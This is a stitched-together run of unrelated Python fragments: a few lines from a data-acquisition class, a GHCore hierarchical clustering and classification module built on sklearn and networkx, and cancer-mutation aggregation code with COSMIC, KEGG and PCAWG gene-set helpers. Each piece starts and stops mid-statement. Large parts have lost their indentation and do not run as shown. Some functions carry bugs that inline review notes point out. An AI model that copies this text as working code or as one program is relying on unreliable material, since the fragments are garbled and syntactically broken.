        # again, and the fact that self.continuous_dt is not None can be used to infer
        # that continuous acquisiton is paused and should be resumed after a buffered
        # run is complete:
        if not pause:
            self.continuous_dt = None
def transition_to_buffered(self, | |
# -*- coding: utf-8 -*-
"""
Created on Wed Nov 21 21:30:31 2018
@authors: <NAME> and <NAME>
"""
# sklearn library
from sklearn import datasets
from sklearn import decomposition
from sklearn.model_selection import StratifiedKFold
from sklearn.metrics import accuracy_score
from sklearn.preprocessing import OneHotEncoder
# here are all the classifiers
from sklearn.ensemble import AdaBoostClassifier
from sklearn.ensemble import BaggingClassifier
from sklearn.ensemble import ExtraTreesClassifier
from sklearn.ensemble import GradientBoostingClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.linear_model import ElasticNet
from sklearn.linear_model import ElasticNetCV
from sklearn.linear_model import Lasso
from sklearn.linear_model import LassoCV
from sklearn.linear_model import LogisticRegression
from sklearn.linear_model import LogisticRegressionCV
from sklearn.linear_model import PassiveAggressiveClassifier
from sklearn.linear_model import RidgeClassifier
from sklearn.linear_model import RidgeClassifierCV
from sklearn.linear_model import SGDClassifier
from sklearn.svm import SVC
from sklearn.neural_network import MLPClassifier
from keras.applications.resnet50 import ResNet50
from keras.models import load_model
from keras import optimizers
from keras.models import Sequential
from keras.layers import Dropout, Flatten, Dense, Conv2D, MaxPooling2D, Activation
from keras.callbacks import EarlyStopping
#from keras_models import keras_cnn_model
from anytree import NodeMixin, RenderTree, LevelOrderIter, search
import networkx as nx
import sys
import os
import datetime
import numpy as np
import matplotlib.pyplot as plt
import copy
from scipy import stats
from scipy.spatial.distance import pdist, cdist, euclidean
import csv
import time
import seaborn as sns
from matplotlib.colors import ListedColormap
#from master.src.main_test import folderName
def retrieve_n_class_color_cubic(N):
    """Return a list of N RGB colour tuples for class colouring.

    The first eight colours are fixed, intuitively ordered choices; any
    further colours are drawn (with a fixed seed, so reproducibly) from a
    progressively finer cubic grid in RGB space.
    """
    # Hand-picked primary/secondary colours, used first.
    palette = [
        (1, 0, 0),
        (0, 1, 0),
        (0, 0, 1),
        (1, 1, 0),
        (0, 1, 1),
        (1, 0, 1),
        (0, 0, 0),
        (1, 1, 1)
    ]
    np.random.seed(1)  # fixed seed keeps the generated palette consistent
    step = 0.5
    # Refine the RGB grid until enough distinct colours are collected.
    while len(palette) < N:
        candidates = []
        grid = np.arange(0, 1.0001, step)
        for r in grid:
            for g in grid:
                for b in grid:
                    if (r, g, b) not in palette:
                        candidates.append((r, g, b))
        candidates = list(set(candidates))
        np.random.shuffle(candidates)
        palette.extend(candidates)
        step = step / 2.0
    return palette[:N]
# Default networkx drawing options (node colour/size and edge width) for
# graph plots.
options = {
    'node_color': 'black',
    'node_size': 100,
    'width': 3,
}
def make_meshgrid(x, y, h=.02):
    """Build a 2-D mesh covering the data range with a one-unit margin.

    x, y are 1-D coordinate arrays; h is the grid step. Returns the
    (xx, yy) arrays produced by np.meshgrid.
    """
    xs = np.arange(x.min() - 1, x.max() + 1, h)
    ys = np.arange(y.min() - 1, y.max() + 1, h)
    xx, yy = np.meshgrid(xs, ys)
    return xx, yy
def plot_contours(clf, xx, yy, **params):
    """Draw filled decision-region contours of `clf` over the mesh (xx, yy).

    Returns the matplotlib contour set and the predicted label grid Z.
    """
    mesh_points = np.c_[xx.ravel(), yy.ravel()]
    Z = clf.predict(mesh_points).reshape(xx.shape)
    out = plt.contourf(xx, yy, Z, **params)
    return out, Z
def evaluate_core(X_core, y_core, X, y, classifier, cname=None, SEED=0):
    """Train `classifier` on the core set (X_core, y_core) and score it on (X, y).

    Returns (X_err, accuracy, fitted_classifier, fail_points, y_pred): the
    misclassified samples, the accuracy on (X, y), the fitted estimator, the
    boolean failure mask, and the raw predictions.
    """
    kwargs = {'random_state': SEED}
    if cname == "SVC":
        # SVC is additionally constructed with probability estimates enabled.
        kwargs['probability'] = True
    referenceClassifier = copy.deepcopy(classifier(**kwargs))
    referenceClassifier.fit(X_core, y_core)
    y_pred = referenceClassifier.predict(X)
    fail_points = y.squeeze() != y_pred
    accuracy = accuracy_score(y, y_pred)
    return X[fail_points], accuracy, referenceClassifier, fail_points, y_pred
class GhcoreNode(NodeMixin):
    """One node of the GHCore growing hierarchical self-organising tree.

    Each node holds a reference vector ``w``, a similarity threshold ``T``,
    the subset of training data (``X``, ``y``) currently assigned to it, and
    a networkx graph recording neighbourhood edges among sibling nodes.

    NOTE(review): the default arguments X=[], y=[], sample_indeces=[],
    child_indeces=[] and graph=nx.Graph() are mutable objects created once
    at definition time and shared between every call that does not pass
    them explicitly. In particular, all nodes constructed without an
    explicit ``graph`` share a single Graph instance. The training code
    appears to rely on this sharing -- confirm before refactoring.
    """
    def __init__(self, node_id, child_id=None, parent=None, X=[], y=[], sample_indeces=[], child_indeces=[], w=None, T=None, etime=1, graph=nx.Graph()):
        super().__init__()
        self.node_id = node_id                # unique string id, e.g. 'Node_3'
        self.child_id = child_id              # index of this node in parent.children
        self.parent = parent                  # anytree parent link
        self.X = X                            # samples assigned to this node
        self.y = y                            # labels of the assigned samples
        self.sample_indeces = sample_indeces  # row indices of X in parent.X
        self.child_indeces = child_indeces    # per-sample winning-child index
        self.w = w                            # reference (prototype) vector
        self.T = T                            # similarity threshold
        self.etime = etime                    # elapsed-time counter (learning-rate decay)
        self.graph = graph                    # neighbourhood graph among children
        self.heterogenity = 0
        # The root's heterogeneity is its total L1 deviation from its centroid.
        if parent is None and len(y) > 0:
            self.heterogenity = np.sum(np.abs(self.X - self.w))
    def display(self):
        """Print an ASCII rendering of the subtree with per-node stats."""
        for pre, _, node in RenderTree(self):
            treestr = u"%s%s" % (pre, node.node_id)
            heterogenity = 0
            if len(node.y) > 0:
                # NOTE(review): np.max over np.unique(..., return_counts=True)
                # maximises over the concatenated (values, counts) pair, not
                # just the counts -- presumably meant as a purity measure;
                # verify.
                heterogenity = np.max( np.unique(node.y, return_counts=True) ) / len(node.y)
            print(treestr.ljust(8), 'n_samples: %d; heterogenity = %.2f' %(len(node.y), heterogenity), end='')
            print('')
    def set_w(self, w):
        """Replace the reference vector."""
        self.w = w
    def set_T(self, T):
        """Replace the similarity threshold."""
        self.T = T
    def set_up_child_indeces(self):
        """Reset the per-sample winning-child map (-1 means unassigned)."""
        self.child_indeces = [-1 for i in range(0, len(self.y))]
    def increment_elapsed_time(self):
        """Advance the counter used to shrink the learning step over time."""
        self.etime = self.etime + 1
    def update_child_id(self, child_node):
        """Record the child's position within self.children."""
        child_node.child_id = len(self.children)-1
    def add_sample(self, sample, target, j, child):
        """Assign sample j (a 1xD row) with label `target` to `child`.

        Returns 0 on success and -1 when the sample has already been
        permanently re-homed (marker -2). If the winning child changed, the
        sample is first removed from the previous winner.
        """
        assert sample.shape[0] == 1
        if self != child.parent:
            # Cross-branch move (used during pruning): append to the new
            # child and mark this slot as re-homed (-2).
            child.X = np.concatenate((child.X, sample))
            child.y = np.concatenate((child.y, target))
            self.child_indeces[j] = -2
            child.sample_indeces.append(-1)
            child.child_indeces.append(-1)
            return 0
        old_child_idx = self.child_indeces[j]
        if old_child_idx == -2: return -1
        if old_child_idx != child.child_id:
            if old_child_idx != -1:
                # Remove the sample from the child that previously won it.
                old_child = self.children[old_child_idx]
                sample_j = old_child.sample_indeces.index(j)
                old_child.X = np.delete(old_child.X, sample_j, axis=0)
                old_child.y = np.delete(old_child.y, sample_j, axis=0)
                old_child.sample_indeces.remove(j)
            if len(child.X) == 0:
                child.X, child.y = sample, target
            else:
                child.X = np.concatenate((child.X, sample))
                child.y = np.concatenate((child.y, target))
            child.sample_indeces.append(j)
            self.child_indeces[j] = child.child_id
        return 0
    def soft_competitive_learning(self, epsilon, sample):
        """Move w towards `sample` by a step that shrinks with elapsed time."""
        Delta = epsilon * (sample - self.w) / self.etime
        self.w = self.w + Delta
    def update_threshold(self, child_node):
        """Recompute child_node.T from its graph neighbours.

        T becomes the max of this node's T and the mean squared distance
        from child_node.w to its neighbours' reference vectors. Returns the
        neighbour node objects.
        """
        neighbours_id = self.get_graph_neighbours(child_node)
        neighbours = search.findall(self, filter_=lambda node: node.node_id in neighbours_id, maxlevel=2)
        neighbours_W = np.array([node.w.squeeze() for node in neighbours])
        distances = np.sum( (child_node.w - neighbours_W)**2 , 1)
        if len(distances) > 1: average_distance = np.mean(distances)
        else: average_distance = distances[0]
        max_distance = np.max((self.T, average_distance))
        # Debugging breadcrumb left by the authors: flags an unset threshold.
        if max_distance == None:
            print(1)
        child_node.set_T(max_distance)
        return neighbours
    def add_graph_node(self, node_id):
        """Add a vertex for a (new) child to the neighbourhood graph."""
        self.graph.add_node(node_id)
    def add_graph_edge(self, winner_1, winner_2):
        """Connect the two winning children with a fresh (age 0) edge."""
        self.graph.add_edge(winner_1.node_id, winner_2.node_id, weight=0)
    def update_graph_edge(self, winner_1, neighbour, age_max):
        """Age the winner-neighbour edge, removing it once past age_max."""
        self.graph[winner_1.node_id][neighbour.node_id]['weight'] += 1
        if self.graph[winner_1.node_id][neighbour.node_id]['weight'] > age_max:
            self.graph.remove_edge(winner_1.node_id, neighbour.node_id)
    def get_graph_neighbours(self, node):
        """Return the ids of the node's graph neighbours."""
        return list(self.graph.adj[node.node_id])
    def draw_graph(self):
        """Show the neighbourhood graph with matplotlib (debug helper)."""
        plt.figure()
        nx.draw(self.graph, with_labels=True, font_weight='bold')
        plt.show()
    def is_to_remove(self, node):
        """True when the node has no remaining graph neighbours."""
        return len(self.graph[node.node_id]) == 0
    def delete_child(self, node):
        """Drop a child from both the graph and the anytree children."""
        self.graph.remove_node(node.node_id)
        self.children = [child for child in self.children if child!=node]
    def pruning(self, node_to_prune):
        """Remove the given leaf nodes, re-homing their samples.

        Each sample of a pruned node is reassigned to the nearest remaining
        leaf (or recorded as an outlier). Must be called on the root; returns
        the collected outliers.
        """
        if len(node_to_prune)== 0: return []
        assert self.parent is None
        leaves = []
        weights = []
        outliers = []
        for node in LevelOrderIter(self):
            if node.is_leaf:
                leaves.append(node)
                weights.append(node.w)
        for node in node_to_prune:
            for j in range(len(node.y)):
                sample = node.X[j, :]
                sample = np.reshape(sample, (1, len(sample)))
                target = node.y[j]
                target = np.reshape(target, (1, len(target)))
                # NOTE(review): the nearest leaf is chosen by argmin of a dot
                # product rather than Euclidean distance -- verify intended.
                distances = np.dot(np.asarray(weights).squeeze(), sample.T)
                nearest = leaves[np.argmin(distances)]
                if nearest.parent == node.parent:
                    if nearest.T > np.min(distances):
                        nearest.parent.add_sample(sample, target, node.sample_indeces[j], nearest)
                    else:
                        # NOTE(review): np.append returns a new array which is
                        # discarded here, so this outlier is never actually
                        # recorded -- likely a bug.
                        np.append(outliers, node.X[j])
                else:
                    node.parent.add_sample(sample, target, node.sample_indeces[j], nearest)
            node.parent.delete_child(node)
        return outliers
    def plot_local_quantization(self, accuracy, n_leaves):
        """Scatter-plot the root's samples with this node's children's
        reference vectors overlaid."""
        nclass = len(np.unique(self.root.y))
        colors = np.array(retrieve_n_class_color_cubic(N=nclass))
        # NOTE(review): labels are indexed with self.root.y-1 here but with
        # self.root.y in plot_quantization -- confirm the label convention.
        cy = np.array([colors[i].squeeze() for i in self.root.y-1])
        W = np.array([child.w.squeeze() for child in self.children])
        plt.figure()
        plt.scatter(self.root.X[:, 0], self.root.X[:, 1], c=cy, marker='.', alpha=0.3, label='voronoi set')
        plt.scatter(W[:, 0], W[:, 1], c='k', marker='o', label='gexin')
        plt.title('Ghcore - h=%d - #C=%d - acc.=%.2f' %(self.root.height, n_leaves, accuracy))
        plt.legend()
        plt.show()
    def plot_quantization(self, X_arch_core, y_arch_core, accuracy, leaves, folder_name, classifier_name):
        """Plot the training data with the learned archetypes overlaid and
        save the figure under folder_name."""
        nclass = len(np.unique(self.root.y))
        colors = np.array(retrieve_n_class_color_cubic(N=nclass))
        cy = np.array([colors[i].squeeze() for i in self.root.y])
        ccore = np.array([colors[i].squeeze() for i in y_arch_core])
        cmap = ListedColormap(sns.color_palette("bright", 3).as_hex())
        plt.figure()
        plt.scatter(self.root.X[:, 0], self.root.X[:, 1], c=cy, cmap=cmap, marker='.', alpha=0.2, label='training set')
        plt.scatter(X_arch_core[:, 0], X_arch_core[:, 1], c=ccore, cmap=cmap, marker='o', label='archetypes')
        plt.title('GH-ARCH - %s - h=%d - acc.=%.2f' %(classifier_name, self.root.height, accuracy))
        plt.legend()
        plt.savefig("%s/ghcore_h%d.png" %(folder_name, self.root.height))
        plt.draw()
def predict_by_core(root, X_test, y_test, classifier):
    """Fit `classifier` on the tree's leaf archetypes and score it on the test set.

    Collects the leaves of `root` (falling back to a leaf's parent when the
    leaf holds no samples), labels each archetype by majority vote over its
    samples, balances the archetype set so every class has the same number
    of reference vectors, then fits classifier[0] on the archetypes.

    Returns (accuracy, arch_core_nodes, fitted_model, X_arch_core,
    y_arch_core). Accuracy is 0 and the model None when the archetypes do
    not cover every class present in y_test.
    """
    arch_core = []
    for node in LevelOrderIter(root):
        if node.is_leaf:
            if len(node.y) > 0:
                arch_core.append(node)
            else:
                arch_core.append(node.parent)
    # De-duplicate: a parent may be appended once per empty leaf.
    _, arch_core_idx = np.unique([node.node_id for node in arch_core], return_index=True)
    arch_core = [ arch_core[i] for i in arch_core_idx]
    X_arch_core = np.array([node.w.squeeze() for node in arch_core])
    # Label each archetype with the majority class of its assigned samples.
    y_arch_core = []
    for node in arch_core:
        classes, n_samples = np.unique(node.y, return_counts=True)
        y_arch_core.append(classes[np.argmax(n_samples)])
    if len( np.unique(y_arch_core) ) < len( np.unique(y_test) ):
        # Not every class is represented by an archetype: report failure.
        accuracy = 0
        model = None
    else:
        n_classes = np.unique(y_arch_core).size
        n_cluster = range(len(y_arch_core))
        max_n_cluster_per_class = np.max(np.unique(y_arch_core, return_counts=True)[1])
        # NOTE(review): classes are assumed to be labelled 0..n_classes-1
        # below -- confirm against the data pipeline.
        for i in range(n_classes):
            i_class_idx = [k for k in n_cluster if y_arch_core[k] == i]
            ith_class_n_cluster = len(i_class_idx)
            # Add each reference vector of a class a number of times equal to
            # the maximum number of clusters representing a single class
            for j in range(max_n_cluster_per_class - ith_class_n_cluster):
                X_arch_core = np.append(X_arch_core,[X_arch_core[i_class_idx[j%len(i_class_idx)]]], axis=0)
                y_arch_core = np.append(y_arch_core,[y_arch_core[i_class_idx[j%len(i_class_idx)]]], axis=0)
        # NOTE(review): dead branch -- keras_cnn_model's import is commented
        # out at the top of the file, so only the else path can ever run.
        if False:
            model, accuracy = keras_cnn_model(X_arch_core, y_arch_core, X_test, y_test)
        else:
            model = copy.deepcopy( classifier[0](random_state=42) )
            model.fit(X_arch_core, y_arch_core)
            accuracy = model.score(X_test, y_test)
    return accuracy, arch_core, model, X_arch_core, y_arch_core
def Ghcore(X_train, y_train, X_val, y_val, X_test, y_test, max_height, min_epochs, max_heterogenity, epsilon_w, epsilon_n, min_size, min_accuracy,
folder_name, heterogenity_decrease, age_max, classifier):
y_train = np.reshape(y_train, (len(y_train), 1))
y_val = np.reshape(y_val, (len(y_val), 1))
X_trainval = np.concatenate((X_train, X_val))
y_trainval = np.concatenate((y_train, y_val))
centroid_X = np.mean(X_train, axis=0)
centroid_X = np.reshape(centroid_X, (1, len(centroid_X)))
n_nodes = 0
root = GhcoreNode('Node_' + str(n_nodes), parent=None, X=X_train, y=y_train, sample_indeces=[], w=centroid_X, T=np.Inf)
root.set_up_child_indeces()
n_nodes = n_nodes + 1
k = 1
parent = root
accuracy = 0
outliers = []
pruned_nodes = 0
model = None
model2 = None
while k < max_height and accuracy < min_accuracy:
# print("Vertical growth - height = %d" %(k))
leaves = [node for node in LevelOrderIter(root) if node.is_leaf and len(node.y) > min_size and node.heterogenity > max_heterogenity]
n_leaves = len(leaves)
if n_leaves == 0:
break
for i in range(0, n_leaves):
parent = leaves[i]
counter = 0
epoch = 0
heterogenity_rate = 0
noise = np.random.uniform(0, 0.0001, parent.w.shape)
n = GhcoreNode('Node_' + str(n_nodes), parent=parent, X=[], y=[], sample_indeces=[], w=parent.w+noise)
parent.update_child_id(n)
parent.add_graph_node('Node_' + str(n_nodes))
n_nodes = n_nodes + 1
n = GhcoreNode('Node_' + str(n_nodes), parent=parent, X=[], y=[], sample_indeces=[], w=parent.w-noise)
parent.update_child_id(n)
parent.add_graph_node('Node_' + str(n_nodes))
n_nodes = n_nodes + 1
while epoch < min_epochs and heterogenity_rate < heterogenity_decrease:
first_time = True
# learning process
for j in range(0, len(parent.y)):
# if k > 2 and epoch > 0 and j > 3:
# print(epoch)
# print(j)
sample = parent.X[j, :]
sample = np.reshape(sample, (1, len(sample)))
target = parent.y[j]
target = np.reshape(target, (1, len(target)))
W = np.array([leaf.w.squeeze() for leaf in parent.children])
distances = np.sum( (sample - W)**2 , 1)
winner_1_idx = np.argmin(distances)
distance = np.sqrt(distances[winner_1_idx])
distances[winner_1_idx] = np.inf
winner_2_idx = np.argmin(distances)
winner_1 = parent.children[winner_1_idx]
winner_2 = parent.children[winner_2_idx]
if first_time:
first_time = False
avgT = np.mean(pdist(parent.X))
if epoch == 0:
winner_1.set_T(avgT)
winner_2.set_T(avgT)
parent.set_T(avgT)
if parent.add_sample(sample, target, j, winner_1) == -1: continue
winner_1.increment_elapsed_time()
winner_1.soft_competitive_learning(epsilon_w, sample)
parent.add_graph_edge(winner_1, winner_2)
# parent.draw_graph()
else:
if False: #parent.get_graph_neighbours(winner_1) >= parent.X.shape[1]:
# use convex hull
1
else:
if winner_1.T == None:
print(1)
explainable = distance < winner_1.T
if explainable:
if parent.add_sample(sample, target, j, winner_1) == -1: continue
winner_1.increment_elapsed_time()
winner_1.soft_competitive_learning(epsilon_w, sample)
parent.add_graph_edge(winner_1, winner_2)
# parent.draw_graph()
neighbours = parent.update_threshold(winner_1)
for neighbour in neighbours:
neighbour.soft_competitive_learning(epsilon_n, sample)
parent.update_threshold(neighbour)
if neighbour != winner_2:
parent.update_graph_edge(winner_1, neighbour, age_max)
else:
new_node = GhcoreNode('Node_' + str(n_nodes), parent=parent, X=[], y=[], sample_indeces=[], w=sample)
parent.update_child_id(new_node)
parent.add_graph_node('Node_' + str(n_nodes))
n_nodes = n_nodes + 1
parent.add_sample(sample, target, j, new_node)
new_node.set_T(parent.T)
counter = 0
if new_node.T == None:
print(1)
if False:
#node pruning
nodes_to_prune = []
for node in parent.children:
if parent.is_to_remove(node):
nodes_to_prune.append(node)
if len(nodes_to_prune) > 0:
outliers.append(root.pruning(nodes_to_prune))
pruned_nodes += len(nodes_to_prune)
heterogenities = []
for node in parent.children:
if len(node.y) > 0:
node.heterogenity = np.sum(np.abs(node.X - node.w))
heterogenities.append(node.heterogenity)
avg_heterogenity = np.mean(heterogenities)
heterogenity_rate = np.abs(avg_heterogenity-parent.heterogenity)/parent.heterogenity
epoch = epoch + 1
counter = counter + 1
for child in parent.children:
child.set_up_child_indeces()
# parent.draw_graph()
if not model is None:
model2 = model
len2 = len(y_arch_core)
accuracy, leaves, model, X_arch_core, y_arch_core = predict_by_core(root, np.concatenate((X_train, X_val)), np.concatenate((y_train, y_val)), classifier)
if X_test.shape[1] == 2:
# parent.plot_quantization(X_arch_core, y_arch_core, accuracy, leaves, folder_name, classifier[1])
X_err_test, accuracy_test, model_test, fail_points_test, y_pred_test = evaluate_core(X_arch_core, y_arch_core, X_test, y_test, classifier[0], cname=classifier[1], SEED=42)
X_err_train, accuracy_train, model_train, | |
cancer_types_samples[mut_info[2]] = [mut_info[5]]
cancer_types_samples_count[mut_info[2]] = 1
'''the last column in the mutation info contains annotations'''
state = "NA"
if 'ChromHMM:' in mut_info[-1]:
for x in mut_info[-1].split('|'):
if x.startswith("ChromHMM:"):
state = x
try:
samples_per_chromhmm[state].append(mut_info[5])
except KeyError:
samples_per_chromhmm[state] = [mut_info[5]]
'''Get samples per allele: e.g C>A:sample1,sample2...'''
try:
samples_per_allele_mut[mut_info[1]].append(mut_info[5])
except:
samples_per_allele_mut[mut_info[1]] = [mut_info[5]]
try:
cols_dict['start'] = str(sorted(mut_start_positions)[0])#l[1]
cols_dict['end'] = str(sorted(mut_end_positions)[-1])#l[2]
cols_dict['Position'] = '{}:{}-{}'.format(l[0],cols_dict['start'],cols_dict['end'])
except IndexError:
#if no mutation was found in the region, skip the line and move on to the next region
continue
cols_dict['Muts'] = ['#'.join(x) for x in mutations_info]
cols_dict['#Muts'] = len(mutations_info)
cols_dict['#Samples'] = len(cols_dict['SamplesMuts'])
c = Counter(cancer_types)
cols_dict['Cancer-Types:#Muts'] = [x+":"+str(c[x]) for x in c]
cols_dict['Cancer-Types:#Samples'] = [x+":"+str(cancer_types_samples_count[x]) for x in cancer_types_samples_count]
'''Process Mutated-Motifs All (not only those that are significant based on regulatory mutations)'''
mutated_motifsall = [x.strip().split('#') for x in l[12].split(',')]
samples_per_tf_motifsall = {}
samples_per_tf_position_motifsall = {}
samples_per_tf_allele_motifsall = {}
samples_per_tf_per_position_per_allele_motifsall = {}
samples_per_chromhmm_motifsall = {}
motifs_already_added = []
muts_already_added = []
for motif_info in mutated_motifsall:
'''avoid recounting the same mutation in the same motif.
This may happen due to multiple instances of the same motif in the mutation position'''
if '#'.join(motif_info[14:18])+"#"+motif_info[8] in motifs_already_added:
continue
motifs_already_added.append('#'.join(motif_info[14:18])+"#"+motif_info[8])
'''Get samples per TF-motif'''
try:
samples_per_tf_motifsall[motif_info[17]].append(motif_info[8])
except KeyError:
samples_per_tf_motifsall[motif_info[17]] = [motif_info[8]]
'''Get samples per TF Motif position; to identify the number of muts per motif position'''
try:
samples_per_tf_position_motifsall[motif_info[17]+"#"+motif_info[13]].append(motif_info[8])
except KeyError:
samples_per_tf_position_motifsall[motif_info[17]+"#"+motif_info[13]] = [motif_info[8]]
'''Get samples per allele; to identify the number of mutation types per allele such as CTCF#A>C:3'''
try:
samples_per_tf_allele_motifsall[motif_info[17]+"#"+motif_info[12]].append(motif_info[8])
except KeyError:
samples_per_tf_allele_motifsall[motif_info[17]+"#"+motif_info[12]] = [motif_info[8]]
try:
samples_per_tf_per_position_per_allele_motifsall[motif_info[17]+"#"+motif_info[13]+"#"+motif_info[12]].append(motif_info[8])
except KeyError:
samples_per_tf_per_position_per_allele_motifsall[motif_info[17]+"#"+motif_info[13]+"#"+motif_info[12]] = [motif_info[8]]
'''Almost all motifs that overlap with single mutation are expected to have the same chromHMM state.
Therefore take state of the first motif'''
if '#'.join(motif_info[0:3])+"#"+motif_info[8] in muts_already_added:
continue
muts_already_added.append('#'.join(motif_info[0:3])+"#"+motif_info[8])
try:
samples_per_chromhmm_motifsall[motif_info[22]].append(motif_info[8])
except KeyError:
samples_per_chromhmm_motifsall[motif_info[22]] = [motif_info[8]]
'''Get counts from dicts'''
samples_dicts = {'RegMuts-ChromHMM':samples_regmuts_per_chromhmm,#Regmuts
'RegMuts-Motifs':samples_regmuts_per_TFmotif, 'RegMuts-MotifPositions':samples_regmuts_per_TFmotif_position,
'RegMuts-MotifAllele':samples_regmuts_per_TFmotif_allele, 'RegMuts-MotifPositions-Allele':samples_regmuts_per_TFmotif_position_allle,
'Muts-ChromHMM':samples_per_chromhmm, 'Muts-Allele':samples_per_allele_mut,#All muts
'Muts-Motifs':samples_per_tf_motifsall, 'Muts-MotifPositions':samples_per_tf_position_motifsall, 'Muts-MotifAllele':samples_per_tf_allele_motifsall,#MutMotifsAll
'Muts-MotifPositions-Allele':samples_per_tf_per_position_per_allele_motifsall, 'Muts-Motifs-ChromHMM':samples_per_chromhmm_motifsall}
for k in sorted(samples_dicts.keys()):
mutcounts = {}
samplecounts = {}
for x in samples_dicts[k]:
mutcounts[x]=len(samples_dicts[k][x])
samplecounts[x]=len(set(samples_dicts[k][x]))
c = ','.join([x.replace('ChromHMM:','')+":"+str(mutcounts[x]) for x in sorted(mutcounts, key=mutcounts.get, reverse=True)])
cols_dict['StatsMuts'].append(k+'['+c+']')
c_unique = ','.join([x.replace('ChromHMM:','')+":"+str(samplecounts[x]) for x in sorted(samplecounts, key=samplecounts.get, reverse=True)])
cols_dict['StatsSamples'].append(k+'['+c_unique+']')
'''Report CancerType:ChromatinType:number_of_times'''
#instead of writing the dict put them in a list to keep the columns order
cols_to_write = [cols_dict['chr'], cols_dict['start'], cols_dict['end'], cols_dict['Position'],
','.join(cols_dict['Cohorts']), cols_dict['#Cohorts'], cols_dict['Score'], cols_dict['FDR'],
cols_dict['#RegMuts'], cols_dict['#Samples(RegMuts)'],
','.join([x+":"+str(cols_dict['Cancer-Types:#RegMuts'][x]) for x in cols_dict['Cancer-Types:#RegMuts']]),
','.join([x+":"+str(cols_dict['Cancer-Types:#Samples(RegMuts)'][x]) for x in cols_dict['Cancer-Types:#Samples(RegMuts)']]),
cols_dict['#Muts'], cols_dict['#Samples'], ','.join(cols_dict['Cancer-Types:#Muts']), ','.join(cols_dict['Cancer-Types:#Samples']),
#'Nearby-Genes(Downstream/Upstream:Distance;COSMIC;KEGG;PCAWG)'
','.join(cols_dict['StatsMuts']),','.join(cols_dict['StatsSamples']),
','.join(cols_dict['RegMuts']), ','.join(cols_dict['Muts']), ','.join(cols_dict['Mutated-Moitfs']), ','.join(cols_dict['Max-RegMotif']),
','.join(cols_dict['SamplesMuts'])
]
aggregated_lines.append(cols_to_write)
summaries_dict['#Elements'] +=1
summaries_dict['#RegMuts'] += cols_dict['#RegMuts']
summaries_dict['#Samples(RegMuts)'] += cols_dict['#Samples(RegMuts)']
summaries_dict['#Muts'] += cols_dict['#Muts']
summaries_dict['#Samples'] += cols_dict['#Samples']
return aggregated_lines, summaries_dict
def generate_genesets_genes_dict(geneset_files,
                                 cosmic_genes_file="analysis/cancer_gene_census.csv",
                                 kegg_pathways_file="analysis/kegg_pathways_fromdb_madeAgenesetPerPathway.gmt",
                                 pcawg_drivers_file="analysis/PCAWG_cancer_drivers_fulllist.txt"):
    """Build {gene-set name: list of gene names and ENSG IDs} from three
    reference files.

    Gene sets collected:
      'COSMIC' -- COSMIC cancer gene census (CSV; first column is the gene
                  name; any ENSG* token on the same line is also recorded).
      'KCP'    -- entries of KEGG pathway path:hsa05200 taken from a
                  GMT-style file (entries start at the 4th tab column).
      'PCD'    -- PCAWG cancer drivers (TSV; the 5th column holds
                  ';'-separated entries; ENSG IDs are pulled from the
                  '::'-separated 2nd column).

    The `geneset_files` parameter is accepted for backward compatibility
    but is not used; the three source paths are now keyword parameters
    whose defaults are the previously hard-coded values.
    """
    genesets_genes_dict = {'KCP': [], 'COSMIC': [], 'PCD': []}
    with open(cosmic_genes_file, 'r') as cosmic_genes_ifile:
        lines = cosmic_genes_ifile.readlines()
        for l in lines[1::]:  # skip the CSV header line
            sl = l.strip().split(',')
            if sl[0] != "":
                genesets_genes_dict['COSMIC'].append(sl[0])
                for s in sl:
                    if s.startswith('ENSG'):
                        genesets_genes_dict['COSMIC'].append(s)
    with open(kegg_pathways_file, 'r') as kegg_pathways_ifile:
        lines = kegg_pathways_ifile.readlines()
        for l in lines:
            # BUGFIX: strip the trailing newline before splitting so the
            # last entry on the line does not keep a '\n' suffix, which
            # made membership tests against it always fail.
            sl = l.rstrip('\n').split('\t')
            if sl[0] == "path:hsa05200":
                genesets_genes_dict['KCP'] = sl[3::]
    with open(pcawg_drivers_file, 'r') as pcawg_drivers_ifile:
        lines = pcawg_drivers_ifile.readlines()
        for l in lines:
            sl = l.strip().split('\t')
            if sl[4] != "":
                genesets_genes_dict['PCD'].extend(sl[4].split(';'))
                for s in sl[1].split('::'):
                    if s.startswith('ENSG'):
                        genesets_genes_dict['PCD'].append(s)
    return genesets_genes_dict
def get_enriched_gene_geneset(regions_genes_dict, genesets_genes_dict):
    """Annotate region-associated genes with the gene sets they belong to.

    regions_genes_dict: region ID -> list of gene-info strings; each entry
        looks like "name::geneID::<distance><side>..." where <side> is a
        single letter O, D or U (presumably Overlapping / Downstream /
        Upstream -- TODO confirm with the producer of this dict).
    genesets_genes_dict: gene-set name -> list of gene names / gene IDs
        (e.g. as built by generate_genesets_genes_dict).

    Side effect: matching entries of regions_genes_dict are extended in
    place with "::<geneset>" for every gene set containing the gene; summary
    counts are printed to stdout.

    Returns (regions_genes_dict, genes_all, genes_all_per_side,
    enriched_genesets_dict_overall, enriched_genesets_dict).
    """
    enriched_genesets_dict = {}          # geneset+<dist><side> -> unique gene names
    enriched_genesets_dict_overall = {}  # geneset -> unique gene names
    genes_all = {}                       # side letter (O/D/U) -> unique gene names
    genes_all_per_side = {}              # <dist><side> -> unique gene names
    for region in regions_genes_dict.keys():
        for i, gene_info in enumerate(regions_genes_dict[region]):
            gene_name = gene_info.split('::')[0]
            gene_id = gene_info.split('::')[1]
            # The third '::' field is "<distance><side letter>...": the
            # chained splits take the prefix before the first O/D/U (the
            # distance), then the indexing re-appends the single O/D/U
            # character that immediately follows it.
            gene_place_dist = gene_info.split('::')[2].split('O')[0].split('D')[0].split('U')[0] + gene_info.split('::')[2][len(gene_info.split('::')[2].split('O')[0].split('D')[0].split('U')[0])]
            # Collect unique gene names per side letter (EAFP: KeyError on
            # first sighting of the key creates the list).
            try:
                if gene_name not in genes_all[gene_place_dist[-1]]:
                    genes_all[gene_place_dist[-1]].append(gene_name)
            except KeyError:
                genes_all[gene_place_dist[-1]] = [gene_name]
            # Collect unique gene names per distance+side combination.
            try:
                if gene_name not in genes_all_per_side[gene_place_dist]:
                    genes_all_per_side[gene_place_dist].append(gene_name)
            except KeyError:
                genes_all_per_side[gene_place_dist] = [gene_name]
            for geneset in sorted(genesets_genes_dict.keys()):
                # Match by name, by full gene ID, or by the gene ID with its
                # version suffix removed (ENSGxxx.N -> ENSGxxx).
                if (gene_name in genesets_genes_dict[geneset] or
                        gene_id in genesets_genes_dict[geneset] or
                        gene_id.split('.')[0] in genesets_genes_dict[geneset]):
                    # Tag the gene-info string in place with the gene set.
